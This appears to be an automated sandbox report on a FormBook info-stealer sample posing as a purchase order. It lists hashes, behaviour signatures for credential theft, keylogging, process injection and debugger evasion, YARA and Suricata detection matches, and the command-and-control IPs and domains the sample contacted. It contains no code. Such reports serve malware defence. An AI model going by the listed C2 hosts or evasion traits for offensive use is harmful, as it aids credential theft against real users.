
Windows Analysis Report
PO AT-5228.exe

Overview

General Information

Sample name: PO AT-5228.exe
Analysis ID: 1554972
MD5: 3df965173d78acbf95001caccbeaa150
SHA1: 0ebe604c158eca5244c2fb19d56b03f6f7ae338a
SHA256: 865ba0cdbc273e3d3035ec2acaf6510977798e008e79546e96e33e289b22c3b2
Tags: exe, Formbook, user-threatcat_ch

Detection

Malware family: FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • PO AT-5228.exe (PID: 7276 cmdline: "C:\Users\user\Desktop\PO AT-5228.exe" MD5: 3DF965173D78ACBF95001CACCBEAA150)
    • svchost.exe (PID: 7300 cmdline: "C:\Users\user\Desktop\PO AT-5228.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • BLUymyzgBTyhbo.exe (PID: 5856 cmdline: "C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • AtBroker.exe (PID: 7352 cmdline: "C:\Windows\SysWOW64\AtBroker.exe" MD5: D5B61959A509BDA85300781F5A829610)
          • BLUymyzgBTyhbo.exe (PID: 2800 cmdline: "C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7744 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000005.00000002.3527019353.0000000005710000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000001.00000002.1781295730.0000000002CD0000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000003.00000002.3524540674.0000000000790000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000003.00000002.3525547305.0000000004210000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000001.00000002.1781112261.0000000000440000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
(3 further memory-dump entries are not included in this extract)

Source | Rule | Description | Author | Strings
1.2.svchost.exe.440000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
1.2.svchost.exe.440000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

                System Summary

                barindex
Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Users\user\Desktop\PO AT-5228.exe", CommandLine: "C:\Users\user\Desktop\PO AT-5228.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\PO AT-5228.exe", ParentImage: C:\Users\user\Desktop\PO AT-5228.exe, ParentProcessId: 7276, ParentProcessName: PO AT-5228.exe, ProcessCommandLine: "C:\Users\user\Desktop\PO AT-5228.exe", ProcessId: 7300, ProcessName: svchost.exe
Source: Process started, Author: vburov, Data: Command: "C:\Users\user\Desktop\PO AT-5228.exe", CommandLine: "C:\Users\user\Desktop\PO AT-5228.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\PO AT-5228.exe", ParentImage: C:\Users\user\Desktop\PO AT-5228.exe, ParentProcessId: 7276, ParentProcessName: PO AT-5228.exe, ProcessCommandLine: "C:\Users\user\Desktop\PO AT-5228.exe", ProcessId: 7300, ProcessName: svchost.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-13T09:26:31.986660+0100 | 2022930 | 1 | A Network Trojan was detected | 20.109.210.53 | 443 | 192.168.2.4 | 49730 | TCP
2024-11-13T09:26:51.947915+0100 | 2022930 | 1 | A Network Trojan was detected | 52.149.20.212 | 443 | 192.168.2.4 | 58815 | TCP
2024-11-13T09:26:53.351914+0100 | 2022930 | 1 | A Network Trojan was detected | 52.149.20.212 | 443 | 192.168.2.4 | 58816 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-13T09:26:44.569269+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 49736 | 38.88.82.56 | 80 | TCP
2024-11-13T09:27:07.951083+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 58820 | 3.33.130.190 | 80 | TCP
2024-11-13T09:27:21.875358+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 58870 | 194.58.112.174 | 80 | TCP
2024-11-13T09:27:35.341841+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 58948 | 3.33.130.190 | 80 | TCP
2024-11-13T09:27:50.170836+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 59023 | 104.21.14.183 | 80 | TCP
2024-11-13T09:28:03.667072+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 59101 | 67.223.117.142 | 80 | TCP
2024-11-13T09:28:17.827029+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 59105 | 3.33.130.190 | 80 | TCP
2024-11-13T09:28:31.644067+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 59109 | 113.20.119.31 | 80 | TCP
2024-11-13T09:28:45.910009+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 59113 | 47.129.103.185 | 80 | TCP
2024-11-13T09:28:59.452166+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 59117 | 38.47.237.27 | 80 | TCP
2024-11-13T09:29:13.863112+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 59121 | 206.119.81.36 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-13T09:27:00.343483+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 58817 | 3.33.130.190 | 80 | TCP
2024-11-13T09:27:03.753028+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 58818 | 3.33.130.190 | 80 | TCP
2024-11-13T09:27:05.405537+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 58819 | 3.33.130.190 | 80 | TCP
2024-11-13T09:27:14.244016+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 58822 | 194.58.112.174 | 80 | TCP
2024-11-13T09:27:16.921423+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 58838 | 194.58.112.174 | 80 | TCP
2024-11-13T09:27:19.306881+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 58854 | 194.58.112.174 | 80 | TCP
2024-11-13T09:27:27.678498+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 58902 | 3.33.130.190 | 80 | TCP
2024-11-13T09:27:30.221107+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 58917 | 3.33.130.190 | 80 | TCP
2024-11-13T09:27:32.803146+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 58932 | 3.33.130.190 | 80 | TCP
2024-11-13T09:27:42.064513+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 58983 | 104.21.14.183 | 80 | TCP
2024-11-13T09:27:44.597204+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 58999 | 104.21.14.183 | 80 | TCP
2024-11-13T09:27:47.160557+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 59009 | 104.21.14.183 | 80 | TCP
2024-11-13T09:27:56.034508+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 59058 | 67.223.117.142 | 80 | TCP
2024-11-13T09:27:58.597030+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 59069 | 67.223.117.142 | 80 | TCP
2024-11-13T09:28:01.387326+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 59085 | 67.223.117.142 | 80 | TCP
2024-11-13T09:28:09.323526+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 59102 | 3.33.130.190 | 80 | TCP
2024-11-13T09:28:11.872164+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 59103 | 3.33.130.190 | 80 | TCP
2024-11-13T09:28:15.300346+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 59104 | 3.33.130.190 | 80 | TCP
2024-11-13T09:28:24.003472+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 59106 | 113.20.119.31 | 80 | TCP
2024-11-13T09:28:26.550389+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 59107 | 113.20.119.31 | 80 | TCP
2024-11-13T09:28:29.144201+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 59108 | 113.20.119.31 | 80 | TCP
2024-11-13T09:28:38.300689+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 59110 | 47.129.103.185 | 80 | TCP
2024-11-13T09:28:40.832105+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 59111 | 47.129.103.185 | 80 | TCP
2024-11-13T09:28:43.409754+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 59112 | 47.129.103.185 | 80 | TCP
2024-11-13T09:28:51.797362+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 59114 | 38.47.237.27 | 80 | TCP
2024-11-13T09:28:54.330228+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 59115 | 38.47.237.27 | 80 | TCP
2024-11-13T09:28:56.906066+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 59116 | 38.47.237.27 | 80 | TCP
2024-11-13T09:29:06.175663+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 59118 | 206.119.81.36 | 80 | TCP
2024-11-13T09:29:08.769360+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 59119 | 206.119.81.36 | 80 | TCP
2024-11-13T09:29:11.316348+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 59120 | 206.119.81.36 | 80 | TCP
2024-11-13T09:29:19.904719+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 59122 | 172.217.16.211 | 80 | TCP


                AV Detection

                barindex
Source: PO AT-5228.exe, Avira: detected
Source: PO AT-5228.exe, ReversingLabs: Detection: 34%
Source: PO AT-5228.exe, Virustotal: Detection: 27%
Source: Yara match, File source: 1.2.svchost.exe.440000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 1.2.svchost.exe.440000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000005.00000002.3527019353.0000000005710000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000002.1781295730.0000000002CD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000002.3524540674.0000000000790000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000002.3525547305.0000000004210000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000002.1781112261.0000000000440000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000002.1781559228.0000000005C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000002.00000002.3525581336.0000000005270000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000002.3524288505.00000000004E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
Source: PO AT-5228.exe, Joe Sandbox ML: detected
Source: PO AT-5228.exe, Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: BLUymyzgBTyhbo.exe, 00000002.00000002.3524476416.0000000000A8E000.00000002.00000001.01000000.00000004.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3524287384.0000000000A8E000.00000002.00000001.01000000.00000004.sdmp
Source: Binary string: ATBroker.pdb source: svchost.exe, 00000001.00000003.1750282155.000000000282B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1750196591.000000000281B000.00000004.00000020.00020000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000002.00000002.3524911092.0000000000E48000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: PO AT-5228.exe, 00000000.00000003.1685890641.0000000004370000.00000004.00001000.00020000.00000000.sdmp, PO AT-5228.exe, 00000000.00000003.1686242447.00000000041D0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1689123695.0000000002A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1781318189.0000000002F9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1692725433.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1781318189.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000003.1789035280.00000000043D5000.00000004.00000020.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000002.3525876435.000000000471E000.00000040.00001000.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000002.3525876435.0000000004580000.00000040.00001000.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000003.1787592715.0000000004216000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: PO AT-5228.exe, 00000000.00000003.1685890641.0000000004370000.00000004.00001000.00020000.00000000.sdmp, PO AT-5228.exe, 00000000.00000003.1686242447.00000000041D0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000003.1689123695.0000000002A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1781318189.0000000002F9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1692725433.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1781318189.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, AtBroker.exe, AtBroker.exe, 00000003.00000003.1789035280.00000000043D5000.00000004.00000020.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000002.3525876435.000000000471E000.00000040.00001000.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000002.3525876435.0000000004580000.00000040.00001000.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000003.1787592715.0000000004216000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: svchost.pdb source: AtBroker.exe, 00000003.00000002.3526286582.0000000004BAC000.00000004.10000000.00040000.00000000.sdmp, AtBroker.exe, 00000003.00000002.3524603774.000000000083A000.00000004.00000020.00020000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000000.1850115627.00000000032DC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2119258740.000000000D29C000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: ATBroker.pdbGCTL source: svchost.exe, 00000001.00000003.1750282155.000000000282B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1750196591.000000000281B000.00000004.00000020.00020000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000002.00000002.3524911092.0000000000E48000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: svchost.pdbUGP source: AtBroker.exe, 00000003.00000002.3526286582.0000000004BAC000.00000004.10000000.00040000.00000000.sdmp, AtBroker.exe, 00000003.00000002.3524603774.000000000083A000.00000004.00000020.00020000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000000.1850115627.00000000032DC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2119258740.000000000D29C000.00000004.80000000.00040000.00000000.sdmp
Source: C:\Users\user\Desktop\PO AT-5228.exe, Code function: 0_2_00BA6CA9 GetFileAttributesW,FindFirstFileW,FindClose, 0_2_00BA6CA9
Source: C:\Users\user\Desktop\PO AT-5228.exe, Code function: 0_2_00BA60DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose, 0_2_00BA60DD
Source: C:\Users\user\Desktop\PO AT-5228.exe, Code function: 0_2_00BA63F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose, 0_2_00BA63F9
Source: C:\Users\user\Desktop\PO AT-5228.exe, Code function: 0_2_00BAEB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_00BAEB60
Source: C:\Users\user\Desktop\PO AT-5228.exe, Code function: 0_2_00BAF5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 0_2_00BAF5FA
Source: C:\Users\user\Desktop\PO AT-5228.exe, Code function: 0_2_00BAF56F FindFirstFileW,FindClose, 0_2_00BAF56F
Source: C:\Users\user\Desktop\PO AT-5228.exe, Code function: 0_2_00BB1B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00BB1B2F
Source: C:\Users\user\Desktop\PO AT-5228.exe, Code function: 0_2_00BB1C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00BB1C8A
Source: C:\Users\user\Desktop\PO AT-5228.exe, Code function: 0_2_00BB1F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_00BB1F94
Source: C:\Windows\SysWOW64\AtBroker.exe, Code function: 3_2_004FC830 FindFirstFileW,FindNextFileW,FindClose, 3_2_004FC830
Source: C:\Windows\SysWOW64\AtBroker.exe, Code function: 4x nop then xor eax, eax, 3_2_004E9EE0
Source: C:\Windows\SysWOW64\AtBroker.exe, Code function: 4x nop then mov ebx, 00000004h, 3_2_043104DF

                Networking

                barindex
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58817 -> 3.33.130.190:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:58820 -> 3.33.130.190:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58818 -> 3.33.130.190:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58819 -> 3.33.130.190:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58838 -> 194.58.112.174:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49736 -> 38.88.82.56:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58854 -> 194.58.112.174:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:58870 -> 194.58.112.174:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58917 -> 3.33.130.190:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58902 -> 3.33.130.190:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58999 -> 104.21.14.183:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58822 -> 194.58.112.174:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58983 -> 104.21.14.183:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:59023 -> 104.21.14.183:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:58948 -> 3.33.130.190:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58932 -> 3.33.130.190:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:59009 -> 104.21.14.183:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:59102 -> 3.33.130.190:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:59069 -> 67.223.117.142:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:59107 -> 113.20.119.31:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:59108 -> 113.20.119.31:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:59109 -> 113.20.119.31:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:59112 -> 47.129.103.185:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:59104 -> 3.33.130.190:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:59103 -> 3.33.130.190:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:59115 -> 38.47.237.27:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:59110 -> 47.129.103.185:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:59101 -> 67.223.117.142:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:59058 -> 67.223.117.142:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:59118 -> 206.119.81.36:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:59106 -> 113.20.119.31:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:59119 -> 206.119.81.36:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:59122 -> 172.217.16.211:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:59113 -> 47.129.103.185:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:59105 -> 3.33.130.190:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:59117 -> 38.47.237.27:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:59085 -> 67.223.117.142:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:59116 -> 38.47.237.27:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:59120 -> 206.119.81.36:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:59111 -> 47.129.103.185:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:59114 -> 38.47.237.27:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:59121 -> 206.119.81.36:80
                Source: DNS query: www.kghjkx.xyz
                Source: DNS query: www.iuyi542.xyz
Source: Joe Sandbox View, IP Address: 67.223.117.142
Source: Joe Sandbox View, IP Address: 38.88.82.56
Source: Joe Sandbox View, IP Address: 206.119.81.36
Source: Joe Sandbox View, ASN Name: VIMRO-AS15189US
Source: Joe Sandbox View, ASN Name: COGENT-174US
Source: Joe Sandbox View, ASN Name: CLOUDFLARENETUS
Source: Network traffic, Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 52.149.20.212:443 -> 192.168.2.4:58816
Source: Network traffic, Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 52.149.20.212:443 -> 192.168.2.4:58815
Source: Network traffic, Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.4:49730
